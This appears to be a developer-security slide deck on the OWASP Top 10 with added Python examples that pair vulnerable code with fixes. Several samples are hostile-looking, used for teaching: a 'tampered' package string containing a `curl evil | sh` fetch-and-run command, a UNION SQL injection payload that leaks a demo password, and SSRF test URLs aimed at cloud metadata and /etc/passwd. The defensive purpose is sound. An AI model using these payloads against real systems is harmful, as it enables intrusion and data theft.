# The DevSec Speedrun
By Robert Babaev
---
## What is DevSec?
- **Dev**eloper **Sec**urity
- Security errors are far cheaper to fix early (design, coding) than later
  - Testing, deployment, production, etc.
- Security is everyone's problem (including yours)
- Demonstrable security skills are also attractive to employers
  - If the company is competent
---
## What is Security?
In short, protecting information and assets.
---
## Where Do We Start?
- OWASP Top 10
  - The most common categories of web vulnerabilities
- Trendy tech
  - Not everything new is secure
---
## Broken Access Control
- Accessing things you should not be able to
- Deny by default
  - Assume people should not access something unless proven otherwise
  - Everything is off limits unless the caller is authenticated *and* authorized for that specific resource
- Don't leave things accessible
  - Git metadata (a `.git/` directory served by the web server)
  - Backups
----
- Query by account id parameter
```java
// The account id is whatever the client put in the request
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();
```
- Parameterised, so no injection, but no check on whether the current user actually owns that account (an insecure direct object reference)
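----
The same bug and its fix in Python against an in-memory SQLite table. This is an added example, not code from the slides; the `accounts` schema, the sample rows and the user ids are constructed for the demo. The fixed query is scoped to the caller's own rows, so there is no code path that returns someone else's account, and the "not found" and "not yours" cases produce the same error.

```python
import sqlite3


def make_db():
    """Constructed sample data: two accounts owned by two different users."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner_id INTEGER, balance INTEGER)"
    )
    con.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)", [(1, 100, 50), (2, 200, 9999)]
    )
    return con


def get_account_vulnerable(con, acct_id):
    # Parameterised (no SQL injection), but still an access control bug:
    # whoever sends acct=2 gets user 200's account.
    return con.execute(
        "SELECT id, owner_id, balance FROM accounts WHERE id = ?", (acct_id,)
    ).fetchone()


def get_account(con, current_user_id, acct_id):
    # Deny by default: the query is scoped to rows the caller owns, so the
    # ownership check cannot be forgotten on some branch later on.
    row = con.execute(
        "SELECT id, owner_id, balance FROM accounts WHERE id = ? AND owner_id = ?",
        (acct_id, current_user_id),
    ).fetchone()
    if row is None:
        # Same error whether the account doesn't exist or isn't theirs, so the
        # response can't be used to enumerate which ids are real.
        raise PermissionError("account not found")
    return row


def can_read(con, current_user_id, acct_id):
    """True if get_account succeeds for this caller, False if it is denied."""
    try:
        get_account(con, current_user_id, acct_id)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    db = make_db()
    print(get_account_vulnerable(db, 2))                # anyone can read account 2
    print(can_read(db, 100, 1), can_read(db, 100, 2))   # True False
```

The ownership column is whatever ties the object to its principal in your schema; the point is that the authorization predicate lives in the same query as the lookup rather than in a separate check that a future code path can skip.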
---
## Cryptographic Failures
- A broad category: weak or misused algorithms, missing TLS, bad randomness, key handling
- One aspect is secret keys
- DO NOT LEAVE SECRET KEYS IN SOURCE CODE!!!!
- Instead:
  - Environment Variables
  - On-the-fly generation
----
Example:
```python
import os
import secrets
class NoKeyError(RuntimeError): pass  # raised when the app starts without a key
# Method 1 (terrible): generate outside and hard code
secret_key = "OipUo3vV4hRUTLCOCaG7UIBqQll3EJuXfup-x-1GDkE"
# Method 2 (better): environment variables
# Note: Don't hard code a default key; fail loudly if it is missing
secret_key = os.environ.get("APP_SECRET_KEY")
if secret_key is None:
    raise NoKeyError("APP_SECRET_KEY is not set")
# Method 3 (debatably best): on-the-fly generation
secret_key = secrets.token_urlsafe(64)
```
- Use env vars or on-the-fly generation
- Env vars are the better fit when the key signs sessions: a key generated at startup changes on every restart and differs between instances, so existing sessions stop validating
---
## Injection
- Shoving code where code should not be shoved
- App doesn't know what statements are malicious or benign
----
SQL injection
```python
# Method 1: Injection!
# What happens when user_input is '0 UNION SELECT * FROM users'?
user_input = request.GET['choice']
cur.execute(f'SELECT * FROM items WHERE id={user_input}')
# Method 2: Prepared Statements (parameters go in a tuple, never in the string)
user_input = request.GET['choice']
cur.execute('SELECT * FROM items WHERE id=?', (user_input,))
```
- The statement is parsed before the parameter is bound, so the input can't change the query's structure
  - It is only ever treated as a value
- ORMs are also a good idea
  - Their raw-query escape hatches can still be injected, though
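----
The `UNION` attack from the slide, run for real against an in-memory SQLite database so you can see what the vulnerable and the parameterised versions each return. This is an added example, not code from the slides; the `items` and `users` tables and their rows are constructed for the demo (both have two columns so the `UNION` lines up).

```python
import sqlite3


def make_db():
    """Constructed sample schema: a public items table and a users table the
    client must never see."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    con.execute("CREATE TABLE users (id INTEGER, password TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    con.executemany("INSERT INTO users VALUES (?, ?)", [(1, "hunter2")])
    return con


def lookup_vulnerable(con, user_input):
    # The input becomes part of the SQL text, so the database parses it as SQL.
    return con.execute(f"SELECT * FROM items WHERE id={user_input}").fetchall()


def lookup_safe(con, user_input):
    # The statement is parsed first; the parameter is bound afterwards as a
    # single value and can never alter the query's structure.
    return con.execute("SELECT * FROM items WHERE id=?", (user_input,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    attack = "0 UNION SELECT * FROM users"
    print(lookup_vulnerable(db, "1"))          # [(1, 'widget')]
    print(lookup_vulnerable(db, attack))       # [(1, 'hunter2')]  the users table leaks
    print(lookup_vulnerable(db, "1 OR 1=1"))   # every item
    print(lookup_safe(db, "1"))                # [(1, 'widget')]
    print(lookup_safe(db, attack))             # []  no id equals that string
```

With the safe version the whole attack string is compared against the `id` column as one value; it matches nothing and the query shape never changes.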
---
## Insecure Design
- Less strictly coding, more design: the code can be bug-free and the system still insecure
----
Example:
- In 2021, graphics card scalping made for an incredibly frustrating market
- To combat this, WeSellGPUs.com decided to implement a 1 GPU per customer policy
- Small problem
  - How do you determine what a customer is?
  - Someone could run multiple order flows, with a bot or by hand, each looking like a separate customer
---
## Security Misconfiguration
- You have a secure site in theory, but something is missing or left at an unsafe default
- Ex: You left password authentication enabled on the server (e.g. SSH) instead of requiring keys
---
## Vulnerable and Outdated Components
- Software gets old!
- Snyk
  - Vulnerability DB
  - See which of your packages have known vulns
- Dependabot, Renovate
  - Automatically open PRs to update your dependencies
---
## Identification and Authentication Failures
- Your login page sucks at keeping attackers out
- Brute forcing and credential stuffing
- Username enumeration
  - "That user doesn't exist" vs "Incorrect password" tells the attacker which usernames are real
- Complete lack of rate limiting or account lockouts
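----
A login routine that addresses all three bullets at once, as an added example rather than code from the slides: one generic error message for unknown user, wrong password and locked account; a dummy hash on unknown usernames so response time doesn't reveal which names exist; and a per-account lockout after repeated failures. `MAX_FAILURES`, `LOCKOUT_SECONDS` and the PBKDF2 iteration count are assumed policy values, and `now` is injectable only so the lockout window can be exercised without sleeping.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

MAX_FAILURES = 5        # assumed policy: lock after 5 failures ...
LOCKOUT_SECONDS = 900   # ... within / for 15 minutes
GENERIC_ERROR = "Invalid username or password."
PBKDF2_ROUNDS = 100_000  # assumed; tune to your hardware


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class LoginService:
    def __init__(self):
        self._users = {}                    # username -> (salt, hash)
        self._failures = defaultdict(list)  # username -> failure timestamps
        # Hashing a dummy password for unknown usernames keeps the response
        # time close to the real-user path, so timing can't enumerate either.
        self._dummy_salt = os.urandom(16)
        self._dummy_hash = _hash("dummy", self._dummy_salt)

    def register(self, username, password):
        salt = os.urandom(16)
        self._users[username] = (salt, _hash(password, salt))

    def _recent_failures(self, username, now):
        window = [t for t in self._failures[username] if now - t < LOCKOUT_SECONDS]
        self._failures[username] = window
        return len(window)

    def login(self, username, password, now=None):
        """Return (ok, message). The message is identical for unknown user,
        wrong password and locked account, so the response leaks nothing."""
        now = time.time() if now is None else now
        if self._recent_failures(username, now) >= MAX_FAILURES:
            return False, GENERIC_ERROR
        salt, stored = self._users.get(username, (self._dummy_salt, self._dummy_hash))
        ok = username in self._users and hmac.compare_digest(_hash(password, salt), stored)
        if ok:
            self._failures[username].clear()
            return True, "Welcome"
        self._failures[username].append(now)
        return False, GENERIC_ERROR


if __name__ == "__main__":
    svc = LoginService()
    svc.register("alice", "correct horse")
    print(svc.login("alice", "correct horse"))   # (True, 'Welcome')
    print(svc.login("alice", "wrong"))           # (False, 'Invalid username or password.')
    print(svc.login("nobody", "wrong"))          # same message, similar timing
```

Per-account lockouts have a cost: an attacker who knows a username can lock its owner out on purpose, so pair them with per-IP rate limiting and keep the window short.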
---
## Software and Data Integrity Failures
- Using code or data whose integrity you never verified: tampered or actively malicious packages, unsigned updates, untrusted build pipelines
- In a phrase: supply chain attacks
- Recommendations: Use known good packages and repositories, pin and verify what you download (signatures, hashes), and verify your build tools too
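----
One concrete form of "verify what you download": pin the hash of a dependency once you have reviewed it, and refuse to install anything that doesn't match (the idea behind `pip install --require-hashes`). This is an added example, not code from the slides; the artifact name, the "good" and "tampered" bytes and the pin table are constructed for the demo. Unknown artifacts and unknown hash algorithms are rejected rather than waved through.

```python
import hashlib
import hmac


def pin_for(data: bytes) -> str:
    """The pin you commit next to a dependency at the moment you trust it."""
    return "sha256:" + hashlib.sha256(data).hexdigest()


def verify_artifact(name: str, data: bytes, pins: dict) -> bool:
    """Deny by default: missing pin, unsupported algorithm or mismatch all fail."""
    pinned = pins.get(name)
    if pinned is None:
        return False
    algo, _, expected = pinned.partition(":")
    if algo != "sha256" or not expected:
        return False
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected)


def install(name: str, fetched: bytes, pins: dict) -> bytes:
    """Only hand bytes to the installer once they match the reviewed pin."""
    if not verify_artifact(name, fetched, pins):
        raise RuntimeError(f"refusing to install {name}: hash mismatch or no pin")
    return fetched


# Constructed sample: the source you reviewed, and a copy a compromised mirror
# might hand you instead.
GOOD = b"def add(a, b):\n    return a + b\n"
TAMPERED = b"def add(a, b):\n    __import__('os').system('curl evil | sh')\n    return a + b\n"
PINS = {"mathlib-1.0.0.tar.gz": pin_for(GOOD)}


if __name__ == "__main__":
    print(PINS)
    print(verify_artifact("mathlib-1.0.0.tar.gz", GOOD, PINS))      # True
    print(verify_artifact("mathlib-1.0.0.tar.gz", TAMPERED, PINS))  # False
```

A hash pin only proves the bytes are the ones you reviewed; it says nothing about whether that review was any good, which is why it complements, rather than replaces, using known good repositories.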
---
## Logging and Monitoring Failures
- Logging is not just for debugging
- Can pinpoint whether attacks are happening (failed logins, access denials, validation failures)
- If you don't have good logging?
  - Attacks take months to find
- With good logging and monitoring, hours, if not seconds
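----
What "good logging" buys you, as an added example rather than code from the slides: structured login events (timestamp, outcome, user, source IP) and a detector that runs over them. The log lines are constructed for the demo and the thresholds are assumed; the point is that one source IP failing against many different usernames in a short window looks like credential stuffing, while many failures against one username looks like brute force, and neither is visible if you only log exceptions.

```python
import json
from collections import defaultdict

# Constructed sample: one JSON object per line, as the app would emit them.
SAMPLE_LOG = """
{"ts": 100, "event": "login", "outcome": "failure", "user": "alice", "ip": "203.0.113.9"}
{"ts": 101, "event": "login", "outcome": "failure", "user": "bob",   "ip": "203.0.113.9"}
{"ts": 102, "event": "login", "outcome": "failure", "user": "carol", "ip": "203.0.113.9"}
{"ts": 103, "event": "login", "outcome": "failure", "user": "dave",  "ip": "203.0.113.9"}
{"ts": 104, "event": "login", "outcome": "success", "user": "erin",  "ip": "203.0.113.9"}
{"ts": 105, "event": "login", "outcome": "failure", "user": "alice", "ip": "198.51.100.4"}
{"ts": 140, "event": "login", "outcome": "success", "user": "alice", "ip": "198.51.100.4"}
{"ts": 150, "event": "login", "outcome": "failure", "user": "bob",   "ip": "192.0.2.77"}
{"ts": 151, "event": "login", "outcome": "failure", "user": "bob",   "ip": "192.0.2.77"}
{"ts": 152, "event": "login", "outcome": "failure", "user": "bob",   "ip": "192.0.2.77"}
{"ts": 153, "event": "login", "outcome": "failure", "user": "bob",   "ip": "192.0.2.77"}
"""


def parse(text):
    """Yield one event dict per non-empty line."""
    for line in text.strip().splitlines():
        if line.strip():
            yield json.loads(line)


def detect(events, window=60, min_failures=4, min_users=3):
    """Sliding-window check per source IP; returns {ip: alert}.
    Thresholds are assumed values, tune them to your traffic."""
    alerts = {}
    per_ip = defaultdict(list)  # ip -> [(ts, user)] failures inside the window
    for e in events:
        if e.get("event") != "login" or e.get("outcome") != "failure":
            continue
        bucket = per_ip[e["ip"]]
        bucket.append((e["ts"], e["user"]))
        bucket[:] = [(t, u) for t, u in bucket if e["ts"] - t <= window]
        if len(bucket) >= min_failures:
            users = sorted({u for _, u in bucket})
            kind = "credential_stuffing" if len(users) >= min_users else "brute_force"
            alerts[e["ip"]] = {"kind": kind, "failures": len(bucket), "users": users}
    return alerts


def run_sample():
    return detect(parse(SAMPLE_LOG))


if __name__ == "__main__":
    for ip, alert in run_sample().items():
        print(ip, alert)
```

Note the success for `erin` from 203.0.113.9 right after the stuffing burst: that is the event an analyst wants flagged, and it is only possible to correlate because every line carries the same fields.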
---
## Server Side Request Forgery
- Ever had a site take a URL as input and send a request to it?
- No URL verification + response visible to the user = HUGE PROBLEM
- Risk of internal servers being compromised: the request comes from the server's own network position, so it can reach internal services the attacker can't
----
Example:
```python
import requests

url = request.GET['site']  # No verification!
r = requests.get(url)      # the server fetches whatever the user asked for
# ... display stuff ...
```
- Use an allowlist where possible
  - Only explicitly allowed domains work; everything else is refused
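----
An allowlist check for the `site` parameter above, as an added example (not code from the slides). `ALLOWED_HOSTS` is an assumed configuration value and `resolve` is injectable so the tests don't need network access. Beyond the bare allowlist it also refuses non-HTTP schemes, rejects `user@host` tricks, and resolves the name so that an allowlisted host pointing at an internal address is still refused.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed allowlist for this example; in a real app this comes from config.
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}


def resolve(host):
    """Every address the host resolves to (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=resolve):
    """Return the URL if it is safe to fetch, otherwise raise ValueError."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")        # no file://, gopher://, ...
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")      # http://api.example.com@127.0.0.1/
    host = parts.hostname
    if host is None or host.lower().rstrip(".") not in allowed_hosts:
        raise ValueError("host not in allowlist")
    for ip in resolver(host):
        if not is_public(ip):                         # allowlisted name, internal address
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return url


def is_safe(url, **kwargs):
    try:
        validate_url(url, **kwargs)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    fake_dns = lambda host: ["93.184.216.34"]   # constructed answer, no network needed
    for candidate in ["https://api.example.com/v1/x",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://api.example.com@127.0.0.1/",
                      "file:///etc/passwd"]:
        print(candidate, is_safe(candidate, resolver=fake_dns))
```

Two caveats when you wire this in front of `requests.get`: the client follows redirects by default, so pass `allow_redirects=False` (or validate every hop), and the address you checked here may not be the one the client connects to a moment later if the attacker controls DNS, so for stronger protection connect to the validated IP or send outbound fetches through an egress proxy that enforces the same list.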
---
## A Note On JWTs
- With plain (stateless) JWTs, logouts aren't really a thing
  - The server can't invalidate a token before it expires, so it can't lock out an attacker who stole one
  - An attacker can save the token and keep reusing it after the user "logs out"
- Compromise:
  - Add a unique "session" id to the payload (the standard `jti` claim)
  - When the user logs out, add that id to a DB table of revoked ids, and check the table on every request
  - Does kill the stateless aspect
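----
The compromise from this slide, end to end, as an added example (not code from the slides): mint an HS256 JWT carrying a unique `jti`, verify it, log out by recording the `jti` in a revocation table, and watch the saved token stop working. The signing key and the `RevokedTokens` class stand in for your real key store and DB table; `now` is injectable only so expiry can be tested without waiting.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _sign(key: bytes, signing_input: str) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def mint(key, sub, ttl=900, now=None):
    """Issue an HS256 JWT whose payload carries a unique id (jti)."""
    now = int(time.time()) if now is None else now
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": sub, "iat": now, "exp": now + ttl, "jti": secrets.token_hex(16)}
    body = (_b64(json.dumps(header, separators=(",", ":")).encode()) + "."
            + _b64(json.dumps(payload, separators=(",", ":")).encode()))
    return body + "." + _b64(_sign(key, body))


class RevokedTokens:
    """Stands in for the DB table of logged-out session ids."""
    def __init__(self):
        self._rows = {}  # jti -> exp

    def add(self, jti, exp):
        self._rows[jti] = exp

    def contains(self, jti):
        return jti in self._rows

    def purge(self, now):
        """A row is only needed until the token would have expired anyway."""
        self._rows = {j: e for j, e in self._rows.items() if e > now}
        return len(self._rows)


def verify(key, token, revoked, now=None):
    """Return the payload or raise ValueError: signature, alg, exp and jti all checked."""
    now = int(time.time()) if now is None else now
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    # Always verify with our own algorithm; never let the token's header pick it.
    if not hmac.compare_digest(_sign(key, f"{h}.{p}"), _unb64(s)):
        raise ValueError("bad signature")
    if json.loads(_unb64(h)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    payload = json.loads(_unb64(p))
    if payload.get("exp", 0) <= now:
        raise ValueError("expired")
    if revoked.contains(payload.get("jti")):
        raise ValueError("logged out")
    return payload


def logout(key, token, revoked, now=None):
    payload = verify(key, token, revoked, now)
    revoked.add(payload["jti"], payload["exp"])


def is_valid(key, token, revoked, now=None):
    try:
        verify(key, token, revoked, now)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key = b"constructed-demo-key"          # assumption: real apps load this from config
    revoked = RevokedTokens()
    token = mint(key, "alice")
    print(is_valid(key, token, revoked))   # True
    logout(key, token, revoked)
    print(is_valid(key, token, revoked))   # False: the saved token is dead
```

The table stays small because a revoked id only has to be remembered until `exp`, so `purge` can run on a timer; the cost of the design is the one lookup per request, which is the "stateless aspect" the slide says you give up.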